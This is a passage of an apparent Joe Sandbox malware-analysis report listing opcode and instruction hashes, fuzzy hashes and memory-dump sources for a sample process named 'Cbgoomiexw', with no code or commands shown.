                                          • Instruction ID: 828d8dbd6c5d2e4a739fef664066f711662a2005945742e5a18a78c2031b2fef
                                          • Opcode Fuzzy Hash: 70bd11a97333b331d4153c8a29f3d2234ab19f1d29f0099d6886e7150df30193
                                          • Instruction Fuzzy Hash: A9019D74A01268CFEB94DB58D848BACF7F2BB05304F048095D549AB650DB70ACC8CFA0
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 028ea0c62bf6c0454cac1102a62f3927f28eaaf1bb10e6b29de669aba111ef0e
                                          • Instruction ID: 3391c34c9b10b4dc1635b82f320f72dc29b8d242993a99725261c32fb8d22ad3
                                          • Opcode Fuzzy Hash: 028ea0c62bf6c0454cac1102a62f3927f28eaaf1bb10e6b29de669aba111ef0e
                                          • Instruction Fuzzy Hash: 22E0926580A248DEC752EFF48A112997FF09F06204F0544DFC089D7112DA395A19DBA1
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2fd0c38a06ce7878cc937f24669ea0982928b181ca410832af1f0a8a2e8c934e
                                          • Instruction ID: 5436e423a841c2c0b02a81082c072c39e22cffd11a2aad631b92f690fad9bf2a
                                          • Opcode Fuzzy Hash: 2fd0c38a06ce7878cc937f24669ea0982928b181ca410832af1f0a8a2e8c934e
                                          • Instruction Fuzzy Hash: E2F09B3060A388AFC702DF75AD1166D7FB6DF46201F1445DFE485D7146D5315F04A7A1
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bf1285f861b8c589d31033b208b085ae8944c2a71291f9a04a6c98f22bc6361e
                                          • Instruction ID: 98aa9d74fee41ad5c74173e09eb7a96d80dd96d3f3fccb88b28b6809147b444d
                                          • Opcode Fuzzy Hash: bf1285f861b8c589d31033b208b085ae8944c2a71291f9a04a6c98f22bc6361e
                                          • Instruction Fuzzy Hash: 7FF06D35E04618AFCB09CBA8D0487DDBFF7EB84221F1480A9E00AD3284EB705AC5CBC4
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ec16fa5c2724b7e53a651593c4334e47c0c8dfa01e33ba5c20c69da68b2a3c12
                                          • Instruction ID: 5ddb798e923aaa0b05d5dbf2458be0c79773581efd61439d5a438f9ff3eeb17c
                                          • Opcode Fuzzy Hash: ec16fa5c2724b7e53a651593c4334e47c0c8dfa01e33ba5c20c69da68b2a3c12
                                          • Instruction Fuzzy Hash: 57F0CF74E00228EFEB90DF58E88579DBBB2FB4A310F104499E149A7355CB349D89CF55
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e007a2f51d136499e17faed490d275b85612a6d9bae1a139da8db4ec89487110
                                          • Instruction ID: 22f65339cb305e27fc080bb1d1d1a64316a15aed15677f0e6d3e5466a3ab56ec
                                          • Opcode Fuzzy Hash: e007a2f51d136499e17faed490d275b85612a6d9bae1a139da8db4ec89487110
                                          • Instruction Fuzzy Hash: ABF0303450A3899FCB12DF75A90068DBFF5DF46610B1404DFD488D7246E9311E889751
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907907899.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6340000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ee1d45c0e9e015f6d9076a3842b79596d79828186517e470c9c90e4e6f9a05d2
                                          • Instruction ID: d8e305fd47125b880ab02142d9b8f8a23a33daaf0ed2088fab2859145e6f09f1
                                          • Opcode Fuzzy Hash: ee1d45c0e9e015f6d9076a3842b79596d79828186517e470c9c90e4e6f9a05d2
                                          • Instruction Fuzzy Hash: 6BF03934909245DFC745DFB0D9410ACBBB0AF46310F24849AC89997361C6319E8ADF90
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907378417.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6190000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 53b5e48dc7fa953bd39546e894b90088b7d0e5a91e7bebbd0e5968385a36a7b1
                                          • Instruction ID: bd3270fc41f4fe83a6e8ff9ba69b06d32d852943d308c3ac1f405050145dcc33
                                          • Opcode Fuzzy Hash: 53b5e48dc7fa953bd39546e894b90088b7d0e5a91e7bebbd0e5968385a36a7b1
                                          • Instruction Fuzzy Hash: 2BF03074D04248EFCB44DFA9C440AADBBF8EF49310F14C09AEC6897341C6359A51DF60
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6fe42b697ecadd41fb7a700c42e909a408e094db0bf05be60eb53b78b1f96127
                                          • Instruction ID: e523cd1d0aa06736eea3bb18b3e08a4b25fdd813a5263bcae5fa2b93ac85c12e
                                          • Opcode Fuzzy Hash: 6fe42b697ecadd41fb7a700c42e909a408e094db0bf05be60eb53b78b1f96127
                                          • Instruction Fuzzy Hash: 5DE0DF30C0F244DFCB068FB094401ACBFB5AB46310F2882EFE40457252D67A4E58DB91
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 888a369df4adc6157b2f1eaa46f1b4613eea0cd9fd71c3c7b26d813b670a7d5d
                                          • Instruction ID: 9d0ad551d36a1aa6b6f350f65127a93ace78a426ec8be977be8d07a2e7ef779b
                                          • Opcode Fuzzy Hash: 888a369df4adc6157b2f1eaa46f1b4613eea0cd9fd71c3c7b26d813b670a7d5d
                                          • Instruction Fuzzy Hash: 33E09AB5C0A348EFD781DFB899652AC7FF0AB0E201F2040AAC408E7755E6301B94CB61
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907907899.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6340000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bcb00df4fb34f7126c629495a38211fedc1e5eeca59cd7721845a5c72dc39566
                                          • Instruction ID: 8f65f5b8d4d28a6c12fb2b2fbac1fb58a27f6a0091ac38d1811def9699237c88
                                          • Opcode Fuzzy Hash: bcb00df4fb34f7126c629495a38211fedc1e5eeca59cd7721845a5c72dc39566
                                          • Instruction Fuzzy Hash: D1F0153490820CEFCB40DF98D8409ACBBB5EB48310F10C099ED1857350D732AA61EF80
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907907899.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6340000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 968ee8aad88bfd57834b2a3f628e4bb77b3be0b4ae79e2f6b48fa08530dbd4e2
                                          • Instruction ID: 562f519434b25a1da8b58b190ae6b9299b519062919692a2e18a90018fa570d6
                                          • Opcode Fuzzy Hash: 968ee8aad88bfd57834b2a3f628e4bb77b3be0b4ae79e2f6b48fa08530dbd4e2
                                          • Instruction Fuzzy Hash: 84F01535904208EFCB45DFA4C8409ACBBB5EB48310F10C09AA91456251C632AA61EF80
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1908231985.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_65f0000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 773b6ab6b474a6d5b872365f02e8bf5ad6d203d7c8d91ec63c823d7b1f16a9ad
                                          • Instruction ID: c3c95b2b0700994b87e663a112f3afd58d5a61fea7e22e117902eb0fa2745ed8
                                          • Opcode Fuzzy Hash: 773b6ab6b474a6d5b872365f02e8bf5ad6d203d7c8d91ec63c823d7b1f16a9ad
                                          • Instruction Fuzzy Hash: 70E0ED74E0820CEFCB94DFA8D5416ADFBF4EB48314F10C0AA981993340D6359A51DF80
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1908231985.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_65f0000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 773b6ab6b474a6d5b872365f02e8bf5ad6d203d7c8d91ec63c823d7b1f16a9ad
                                          • Instruction ID: 265e8d0e22fdd7deea8981cd175abd897f71707c1c2ed66573b594571ef262ee
                                          • Opcode Fuzzy Hash: 773b6ab6b474a6d5b872365f02e8bf5ad6d203d7c8d91ec63c823d7b1f16a9ad
                                          • Instruction Fuzzy Hash: 07E0ED74D04208EFCB84DFA9D5416ADFBF5EB48310F10C1AA982893341D6359E51DF80
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1908231985.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_65f0000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 773b6ab6b474a6d5b872365f02e8bf5ad6d203d7c8d91ec63c823d7b1f16a9ad
                                          • Instruction ID: d14fd80d86b9139448531d314aa631bdac5dd111cbe70972f4e7888fbaa8ed20
                                          • Opcode Fuzzy Hash: 773b6ab6b474a6d5b872365f02e8bf5ad6d203d7c8d91ec63c823d7b1f16a9ad
                                          • Instruction Fuzzy Hash: 5DE0ED74D04208EFCB84DFA8D4416ADFBF4FB8C310F10C0AA985893341D6359A51DF80
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1908231985.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_65f0000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 773b6ab6b474a6d5b872365f02e8bf5ad6d203d7c8d91ec63c823d7b1f16a9ad
                                          • Instruction ID: 4794fd255304ae7b8fde2ee77ad327596fb66a95948b5655954029852822f4c4
                                          • Opcode Fuzzy Hash: 773b6ab6b474a6d5b872365f02e8bf5ad6d203d7c8d91ec63c823d7b1f16a9ad
                                          • Instruction Fuzzy Hash: D2E0ED74D08208EFCB88DFA8D441AADFBF4EB88310F10C0AA981893340D6369E51DF80
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1908231985.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_65f0000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 734b6b9a6845c05401b97d58544ef1bd88de94564e58fa907385505c5cc27e3a
                                          • Instruction ID: 8fdf67e13fc38d16e797560f5f1aee43b7df62479cbe38603fdb4e08f1e8d59f
                                          • Opcode Fuzzy Hash: 734b6b9a6845c05401b97d58544ef1bd88de94564e58fa907385505c5cc27e3a
                                          • Instruction Fuzzy Hash: 9FF05230A18214CFE754EF68DCA8B9ABBB6EF85341F0004D9911AAB284CB302A80CF50
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3f6f0edcfba95e9d6a88301e204a5ff474cea0f6e02a26cf337ce874470951f7
                                          • Instruction ID: 64812a16677cd1c0343702c7e60a71cff336da02a89121a7ce081e064283ffa0
                                          • Opcode Fuzzy Hash: 3f6f0edcfba95e9d6a88301e204a5ff474cea0f6e02a26cf337ce874470951f7
                                          • Instruction Fuzzy Hash: 9DE0E574E04208EFCB84DFA8D4416ACBBF4EB48300F10C0AAA81897340D735AA41CF80
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3f6f0edcfba95e9d6a88301e204a5ff474cea0f6e02a26cf337ce874470951f7
                                          • Instruction ID: d0541058f014a097f8210db595d765b6786c566053159036bc92b9e540e3feb2
                                          • Opcode Fuzzy Hash: 3f6f0edcfba95e9d6a88301e204a5ff474cea0f6e02a26cf337ce874470951f7
                                          • Instruction Fuzzy Hash: 11E01A74E08208EFCB84DFA8D8416ACFBF8EB48310F10C0AA981893341D735AE41CF80
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907907899.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6340000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 343dc825e7288b90df7b8726f6d1e7815a07795eb4eaf70362d859a040b72599
                                          • Instruction ID: d789573e57a728349b3bedc27381c7e5cdedfeecf437f1e1ed9cb2232741f1e8
                                          • Opcode Fuzzy Hash: 343dc825e7288b90df7b8726f6d1e7815a07795eb4eaf70362d859a040b72599
                                          • Instruction Fuzzy Hash: 51E0E574D08208EFCB44DFA9D4419ACFBB4EB48310F10C1AA985857351C635AA91DF90
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907907899.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6340000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 343dc825e7288b90df7b8726f6d1e7815a07795eb4eaf70362d859a040b72599
                                          • Instruction ID: 210faf95001ad2c9c86a9c6fd02e241c81acb5d705e88e28cc1bf44d6bddb11e
                                          • Opcode Fuzzy Hash: 343dc825e7288b90df7b8726f6d1e7815a07795eb4eaf70362d859a040b72599
                                          • Instruction Fuzzy Hash: DDE0E574D08208EFCB44DFA9D4419BCFBF4EB48310F14C0AA9C5857341C635AA91DF94
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1908231985.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_65f0000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a72ce418b17853097659e9ba82f3a7f542c26f145593abacdfcc2243f6cbb358
                                          • Instruction ID: ad57968389e82a324d391202cfd6bfa7b0904ac64628bfb7734cb59f08034deb
                                          • Opcode Fuzzy Hash: a72ce418b17853097659e9ba82f3a7f542c26f145593abacdfcc2243f6cbb358
                                          • Instruction Fuzzy Hash: DDE04F75908218EBC744DFA4D4419ADBBB8EB49310F10C0ADD85957381CA329A52DB90
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 63cce8192b7da5ca5de7a5d221619a491ad06516bdab69527a612de9b4ee7675
                                          • Instruction ID: 8c9123b6f4b678dca75f758531c409da216572a1815f477e49701f3af42edee0
                                          • Opcode Fuzzy Hash: 63cce8192b7da5ca5de7a5d221619a491ad06516bdab69527a612de9b4ee7675
                                          • Instruction Fuzzy Hash: C9D05E316443349BEBE06AB09D41BA673DC9F46B11F100469EA15AF2D0DAB2E851C7D1
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 54ee2e5722095a8b33e3c5cd942b0b9bd63287fcc00b6c6f39a96c376c41aaec
                                          • Instruction ID: 4126539754db6829d89b825d8842a57145b8a79eb752e4037334e3b318280149
                                          • Opcode Fuzzy Hash: 54ee2e5722095a8b33e3c5cd942b0b9bd63287fcc00b6c6f39a96c376c41aaec
                                          • Instruction Fuzzy Hash: 55F03070E00328DFDB54DF14E495B9DBBB2EB46300F1084DAD206A3344CB305E808FA2
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4f285cefa1fab7f81801de8773bdad0ce2d99a82570ed0f14ef7518fcf9fb1d0
                                          • Instruction ID: 2c2f362ff7785e4648a5bc0f15a8240657958fcb468d4c54fe0d5ad98c481f4e
                                          • Opcode Fuzzy Hash: 4f285cefa1fab7f81801de8773bdad0ce2d99a82570ed0f14ef7518fcf9fb1d0
                                          • Instruction Fuzzy Hash: B3E0DF3080E244EFC301CFB4DA165AC7F30AB0B305F0481CAC00567251C6340A94CFA1
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9da1fdd7a0598f451908beb5c6d59210fb5ddc1df984114e324809aea0a63f69
                                          • Instruction ID: 19d631cc2a63b091a375f185e742f692a4c8e94155dcb9b3be13bb4b7a8a2623
                                          • Opcode Fuzzy Hash: 9da1fdd7a0598f451908beb5c6d59210fb5ddc1df984114e324809aea0a63f69
                                          • Instruction Fuzzy Hash: 8BD0123A30A2914FC752DB75F8409887FB09A5652131441EFD0C8CB522C1115849C750
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0bd5b43d9967fbd084b808ce91db574b3b209bdb99d07d6f1fac0e50d42994b2
                                          • Instruction ID: a2c762e8ff42315efb97f833ded9fb9b115a488076d34363d7641d0583380f84
                                          • Opcode Fuzzy Hash: 0bd5b43d9967fbd084b808ce91db574b3b209bdb99d07d6f1fac0e50d42994b2
                                          • Instruction Fuzzy Hash: 58E08C70D1820CEFC780EFB8C8416ACBBF8EB08300F2081A9C808D3340EA31AE41CB80
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1908231985.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_65f0000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 47530825f5d2dc7cde1d38d13c7a089cc0ba00b64a99b5e64294172476792e1a
                                          • Instruction ID: e34f21a8ae7e6af52e910c5497602c6bc3467c8da544731f3ad8e3d9b24fd447
                                          • Opcode Fuzzy Hash: 47530825f5d2dc7cde1d38d13c7a089cc0ba00b64a99b5e64294172476792e1a
                                          • Instruction Fuzzy Hash: F7E01A34D08208EFCB48DFA9D4415ACBBB8EB48304F10C0AA981857381DA355E52DF80
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1908231985.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_65f0000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 47530825f5d2dc7cde1d38d13c7a089cc0ba00b64a99b5e64294172476792e1a
                                          • Instruction ID: 9e726d73391100b7475397dd4dee9a874440caf24517bb27c7707f4aaeceffb3
                                          • Opcode Fuzzy Hash: 47530825f5d2dc7cde1d38d13c7a089cc0ba00b64a99b5e64294172476792e1a
                                          • Instruction Fuzzy Hash: 16E01A34D08208EFC744DFA8D4415ACBBB4EB88300F10C0AA981857381D6356A52DF90
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 10910836558bf082d3e1494d1f3cb87de727ffc1d40a26d55c868a5cc057ef29
                                          • Instruction ID: 9b0a7d4721c1ae6d72cbfb4ebb597db949f2dd28a66b920d7da45739806a1e76
                                          • Opcode Fuzzy Hash: 10910836558bf082d3e1494d1f3cb87de727ffc1d40a26d55c868a5cc057ef29
                                          • Instruction Fuzzy Hash: 56E0C2B080120CEBC740EFB8C90069E77F8DB09200F0044A9D50893100EE315E04DBE1
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e7da6d7d1ca21834a5c9d652967d370b28502f5c9e4b6fcf4f00c539f34e6ea6
                                          • Instruction ID: af0694dd347605783a4b86e58bcee82fbdf53fcf0be8928612e4c8f2c0b7d34d
                                          • Opcode Fuzzy Hash: e7da6d7d1ca21834a5c9d652967d370b28502f5c9e4b6fcf4f00c539f34e6ea6
                                          • Instruction Fuzzy Hash: 89E0EC74D05218EFDB80EFB8E4566ACBBF8EB0E201F1040A9D908E3245E6706A94CB91
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907907899.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6340000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e03e0aed6edcd86b0f18d5a79571302b60da9090ac2fa72b6466920c8c459196
                                          • Instruction ID: 0650f2532b5095736a1ef7bcf8a92a2e490c438ae5f0ccd722704903251c74cc
                                          • Opcode Fuzzy Hash: e03e0aed6edcd86b0f18d5a79571302b60da9090ac2fa72b6466920c8c459196
                                          • Instruction Fuzzy Hash: 80E0EC34D09208EBC744EFA4D5515ADFBF8EB49314F108199980827351CA72AE56DB91
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907907899.0000000006340000.00000040.00000800.00020000.00000000.sdmp, Offset: 06340000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6340000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e03e0aed6edcd86b0f18d5a79571302b60da9090ac2fa72b6466920c8c459196
                                          • Instruction ID: 0be1f28b8b077d07b3cac2989c415b80e8ca4aaebbe849e3b1d64bcaea123538
                                          • Opcode Fuzzy Hash: e03e0aed6edcd86b0f18d5a79571302b60da9090ac2fa72b6466920c8c459196
                                          • Instruction Fuzzy Hash: 83E0EC34909208EBC744EFA4D5455BCFBB8EB49314F109599981817341CA71AE96DFD1
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1908231985.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_65f0000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 16368b5b3804edd29799ee458baf797fb2e86f7c202224973eaf4ee6d67a141c
                                          • Instruction ID: 1fb00aa80f029450f67e750779bf1367b20a192b57c7573bb1ac67ac398dee74
                                          • Opcode Fuzzy Hash: 16368b5b3804edd29799ee458baf797fb2e86f7c202224973eaf4ee6d67a141c
                                          • Instruction Fuzzy Hash: D3E01271C45208EBC744EFB4C90569E77F8DB09210F0089A6951997150EE755E14DBE2
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1908231985.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_65f0000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9f09adacdef5f9fa08ce563896543d2b8de39da9e0032a70120ce85985ab8e2e
                                          • Instruction ID: 7cbb66c2fa48f72658cb0daf9559de511bea293b84b77eba4cad6215eb13ff41
                                          • Opcode Fuzzy Hash: 9f09adacdef5f9fa08ce563896543d2b8de39da9e0032a70120ce85985ab8e2e
                                          • Instruction Fuzzy Hash: 41E01234D49208EFD748DFE8D5415ADBBB4EB49314F20C1A9D81927381CA716E53DB91
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1cedd36d6f1b90822b68a33ec6d9cdbcb3c516713406c712d2cad09977d45833
                                          • Instruction ID: 0dc9a429e05f498687001ed4960b1defa1f0fc304d5e3379edf5c26e83c8d3d1
                                          • Opcode Fuzzy Hash: 1cedd36d6f1b90822b68a33ec6d9cdbcb3c516713406c712d2cad09977d45833
                                          • Instruction Fuzzy Hash: 16E01270A0120CEFCB44DFB5E94166DBBFBDB44301F1085A9D909D7248DA326F00AB91
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.1907841593.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6330000_Cbgoomiexw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 843088ceec3c03ec85a7be024ad7bc0ef55c6d257069d9a2489a996a2a9c5257
                                          • Instruction ID: 1044287e576dcfdd16ce2c6464b72e73b0265371d7787794e7d59083a2bd509e
